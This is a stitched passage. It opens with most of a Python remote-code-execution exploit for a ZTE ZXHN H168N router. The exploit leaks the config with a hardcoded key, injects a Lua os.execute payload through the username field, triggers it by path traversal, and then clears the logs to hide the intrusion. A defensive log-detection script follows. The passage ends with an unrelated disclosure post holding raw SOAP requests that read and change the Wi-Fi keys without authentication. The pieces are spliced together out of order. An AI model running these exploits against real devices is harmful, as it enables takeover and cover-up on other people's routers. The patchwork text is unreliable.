        "NewConfirmPassword": old_password,
        "Btn_cancel_AccountManag": "",
        "Btn_apply_AccountManag": ""
    }

    requests.get(f"http://{host}:{port}/getpage.lua?pid=123&nextpage=ManagDiag_AccountManag_t.lp&Menu3Location=0")
    requests.get(f"http://{host}:{port}/common_page/accountManag_lua.lua")
    requests.post(f"http://{host}:{port}/common_page/accountManag_lua.lua", headers=headers, data=data)

def clear_log(host, port):
    headers = {
        "Content-Type": "application/x-www-form-urlencoded"
    }

    data = {
        "IF_ACTION": "clearlog"
    }

    requests.get(f"http://{host}:{port}/getpage.lua?pid=123&nextpage=ManagDiag_LogManag_t.lp&Menu3Location=0")
    requests.get(f"http://{host}:{port}/common_page/ManagDiag_LogManag_lua.lua")
    requests.post(f"http://{host}:{port}/common_page/ManagDiag_LogManag_lua.lua", headers=headers, data=data)

def refresh_log(host, port):
    headers = {
        "Content-Type": "application/x-www-form-urlencoded"
    }

    data = {
        "IF_ACTION": "Refresh"
    }

    requests.get(f"http://{host}:{port}/getpage.lua?pid=123&nextpage=ManagDiag_LogManag_t.lp&Menu3Location=0")
    requests.get(f"http://{host}:{port}/common_page/ManagDiag_LogManag_lua.lua")
    requests.post(f"http://{host}:{port}/common_page/ManagDiag_LogManag_lua.lua", headers=headers, data=data)

def trigger_rce(host, port):
    requests.get(f"http://{host}:{port}/getpage.lua?pid=123&nextpage=ManagDiag_StatusManag_t.lp&Menu3Location=0")
    requests.get(f"http://{host}:{port}/getpage.lua?pid=123&nextpage=..%2f..%2f..%2f..%2f..%2f..%2f..%2fvar%2fuserlog.txt&Menu3Location=0")

def rce(cmd):
    return f"<? _G.os.execute('rm /var/userlog.txt;{cmd}') ?>"

def pwn(config_key, host, port):
    leak_config(host, port)
    username, password = decrypt_config(config_key)
    
    login(host, port, username, password)

    shellcode = "echo \"pwned\""
    payload = rce(shellcode)

    change_username(host, port, payload, password)
    refresh_log(host, port)
    change_log_level(host, port, "notice")
    refresh_log(host, port)

    trigger_rce(host, port)
    clear_log(host, port)

    change_username(host, port, username, password)
    change_log_level(host, port, "critical")
    logout(host, port)
    print("[+] PoC complete")

def main():
    parser = argparse.ArgumentParser(description="Run remote command on ZTE ZXHN H168N V3.1")
    parser.add_argument("--config_key", type=lambda x: x.encode(), default=b"GrWM3Hz&LTvz&f^9", help="Leaked config encryption key from cspd")
    parser.add_argument("--host", required=True, help="Target IP address of the router")
    parser.add_argument("--port", required=True, type=int, help="Target port of the router")

    args = parser.parse_args()
    
    pwn(args.config_key, args.host, args.port)

if __name__ == "__main__":
    main()
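Defender-side detection for the request sequence in the PoC above, as an added example that is not the PoC author's code: it runs over constructed common-log-format lines and flags a nextpage value that escapes the page directory and a config export by a client that has not logged in. Treating a 200 response to POST / as a successful login is an assumption about this web UI, and the log lines, IPs and times are made up.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Common-log-format lines, constructed to mirror the PoC's request order:
# config export, login, account change, traversal read of the log file.
# A different client then loads a normal page.  IPs and times are made up.
SAMPLE_LOG = """\
10.0.0.50 - - [01/Jan/2024:10:00:01 +0000] "POST /getpage.lua?pid=101&nextpage=ManagDiag_UsrCfgMgr_t.lp HTTP/1.1" 200 8192
10.0.0.50 - - [01/Jan/2024:10:00:02 +0000] "POST / HTTP/1.1" 200 512
10.0.0.50 - - [01/Jan/2024:10:00:03 +0000] "POST /common_page/accountManag_lua.lua HTTP/1.1" 200 128
10.0.0.50 - - [01/Jan/2024:10:00:05 +0000] "GET /getpage.lua?pid=123&nextpage=..%2f..%2f..%2f..%2f..%2f..%2f..%2fvar%2fuserlog.txt&Menu3Location=0 HTTP/1.1" 200 64
10.0.0.7 - - [01/Jan/2024:10:01:00 +0000] "GET /getpage.lua?pid=123&nextpage=ManagDiag_StatusManag_t.lp&Menu3Location=0 HTTP/1.1" 200 4096
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+)[^"]*" '
    r'(?P<status>\d{3}) \S+$'
)
LOGIN_PATH = "/"                                 # the PoC logs in with POST /
CONFIG_EXPORT_PAGE = "ManagDiag_UsrCfgMgr_t.lp"  # the export the PoC pulls first


def parse_line(line):
    """Split one access-log line into ip/method/target/status, or None."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    return rec


def nextpage_value(target):
    """The (percent-decoded) nextpage parameter of a request target, if any."""
    vals = parse_qs(urlsplit(target).query, keep_blank_values=True).get("nextpage")
    return vals[-1] if vals else None


def is_traversal(value):
    """True when a nextpage value escapes the page directory.

    Decodes once more to catch double-encoded separators, then flags a
    parent-directory segment or an absolute path.
    """
    decoded = unquote(value)
    return "../" in decoded or "..\\" in decoded or decoded.startswith("/")


def analyze(log_text):
    """Return (ip, rule, evidence) findings for the two indicators.

    Login tracking is per client IP and assumes a 200 to POST / means the
    login succeeded; a real deployment would key on the session cookie.
    """
    findings = []
    logged_in = set()
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        path = urlsplit(rec["target"]).path
        if rec["method"] == "POST" and path == LOGIN_PATH and rec["status"] == 200:
            logged_in.add(rec["ip"])
        page = nextpage_value(rec["target"])
        if page is None:
            continue
        if is_traversal(page):
            findings.append((rec["ip"], "path traversal in nextpage", page))
        elif page == CONFIG_EXPORT_PAGE and rec["ip"] not in logged_in:
            findings.append((rec["ip"], "config export without prior login", page))
    return findings


if __name__ == "__main__":
    for finding in analyze(SAMPLE_LOG):
        print(*finding)
```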
            
[*] POC: (CVE-2018-7357 and CVE-2018-7358)

Disclaimer: [This POC is for Educational Purposes , I would Not be
responsible for any misuse of the information mentioned in this blog post]

[+] Unauthenticated

[+] Author: Usman Saeed (usman [at] xc0re.net)

[+] Protocol: UPnP

[+] Affected Hardware/Software:

Model name: ZXHN H168N v2.2
Build Timestamp: 20171127193202
Software Version: V2.2.0_PK1.2T5

[+] Findings:

1. Unauthenticated access to WLAN password:

POST /control/igd/wlanc_1_1 HTTP/1.1
Host: <IP>:52869
User-Agent: {omitted}
Content-Length: 288
Connection: close
Content-Type: text/xml; charset="utf-8"
SOAPACTION: "urn:dslforum-org:service:WLANConfiguration:1#GetSecurityKeys"

<?xml version="1.0" encoding="utf-8"?>
<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:GetSecurityKeys xmlns:u="urn:dslforum-org:service:WLANConfiguration:1"></u:GetSecurityKeys></s:Body></s:Envelope>

2. Unauthenticated WLAN passphrase change:

POST /control/igd/wlanc_1_1 HTTP/1.1
Host: <IP>:52869
User-Agent: {omitted}
Content-Length: 496
Connection: close
Content-Type: text/xml; charset="utf-8"
SOAPACTION: "urn:dslforum-org:service:WLANConfiguration:1#SetSecurityKeys"

<?xml version="1.0" encoding="utf-8"?>
<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:SetSecurityKeys xmlns:u="urn:dslforum-org:service:WLANConfiguration:1"><NewWEPKey0>{omitted}</NewWEPKey0><NewWEPKey1>{omitted}</NewWEPKey1><NewWEPKey2>{omitted}</NewWEPKey2><NewWEPKey3>{omitted}</NewWEPKey3><NewPreSharedKey>{omitted}</NewPreSharedKey><NewKeyPassphrase>{omitted}</NewKeyPassphrase></u:SetSecurityKeys></s:Body></s:Envelope>

[*] Solution:

UPnP should not provide excessive services, and if the fix is not possible, then UPnP should be disabled on the affected devices.

[*] Note:

There are other services which should not be published over UPnP, which are not mentioned in this blog post, as the solution is the same.

[+] Responsible Disclosure:

Vulnerabilities identified – 20 August, 2018
Reported to ZTE – 28 August, 2018
ZTE official statement – 17 September 2018
ZTE patched the vulnerability – 12 November 2018
The operator pushed the update – 12 November 2018
CVE published – Later
Public disclosure – 12 November 2018
Ref: http://support.zte.com.cn/support/news/LoopholeInfoDetail.aspx?newsId=1009522